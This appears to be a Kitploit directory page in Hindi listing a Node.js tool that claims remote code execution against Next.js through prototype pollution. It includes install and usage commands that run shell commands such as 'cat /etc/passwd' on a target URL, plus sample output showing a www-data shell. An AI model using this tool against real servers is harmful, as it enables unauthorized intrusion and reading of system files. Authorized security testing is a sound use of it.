Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE Exploit Tool | Kitploit
उपकरण/GitHubGitHub/racall/cve-2025-55182-node
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE Exploit Tool

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 Next.js RCE शोषण उपकरण

चीनी दस्तावेज़ | कमजोरी सिद्धांत विश्लेषण


[!CAUTION]

⚠️ अस्वीकरण - उपयोग से पहले पढ़ें

यह उपकरण केवल इसके लिए है:

  • सुरक्षा शोधकर्ता भेद्यता सत्यापन कर रहे हैं
  • स्पष्ट अनुमति के साथ अधिकृत पैठ परीक्षण
  • शैक्षिक और सीखने के उद्देश्य

कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।

इस उपकरण का उपयोग करके, आप सहमत हैं कि:

  1. आपने किसी भी सिस्टम का परीक्षण करने से पहले उचित अधिकार प्राप्त कर लिया है
  2. आप इस उपकरण का उपयोग दुर्भावनापूर्ण उद्देश्यों के लिए नहीं करेंगे
  3. आप अपने कार्यों और किसी भी परिणाम के लिए पूरी तरह जिम्मेदार हैं

लेखक इस उपकरण के दुरुपयोग के लिए कोई दायित्व नहीं लेता है।


Next.js सर्वर-साइड प्रोटोटाइप प्रदूषण भेद्यता के लिए एक दूरस्थ कोड निष्पादन (RCE) शोषण उपकरण।

भेद्यता अवलोकन

CVE-2025-55182 एक गंभीर सुरक्षा भेद्यता है जो Next.js को प्रभावित करती है और हमलावरों को प्रोटोटाइप प्रदूषण का शोषण करके तैयार किए गए अनुरोधों के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देती है।

📖 विस्तृत तकनीकी विश्लेषण के लिए, EXPLOIT.md देखें

प्रभावित संस्करण

  • Next.js के विशिष्ट संस्करण (आधिकारिक सुरक्षा सलाह देखें)

यह कैसे काम करता है

यह भेद्यता Next.js सर्वर एक्शन अनुरोध हैंडलिंग तंत्र का शोषण करती है, __proto__ प्रोटोटाइप श्रृंखला प्रदूषण के माध्यम से Function कंस्ट्रक्टर के साथ मिलकर मनमाना कोड निष्पादन प्राप्त करती है।

स्थापना

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

उपयोग

प्रत्यक्ष निष्पादन

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

yarn स्क्रिप्ट का उपयोग करना

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

वैश्विक CLI स्थापना

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

CLI विकल्प

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

आउटपुट प्रारूप

यह उपकरण परिणाम JSON प्रारूप में आउटपुट करता है:

सफल निष्पादन

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

असफल निष्पादन

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

उदाहरण

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

निर्भरताएँ

  • axios - HTTP क्लाइंट
  • form-data - FormData निर्माता

संदर्भ

  • Python स्क्रिप्ट देखें
टूल डाउनलोड करें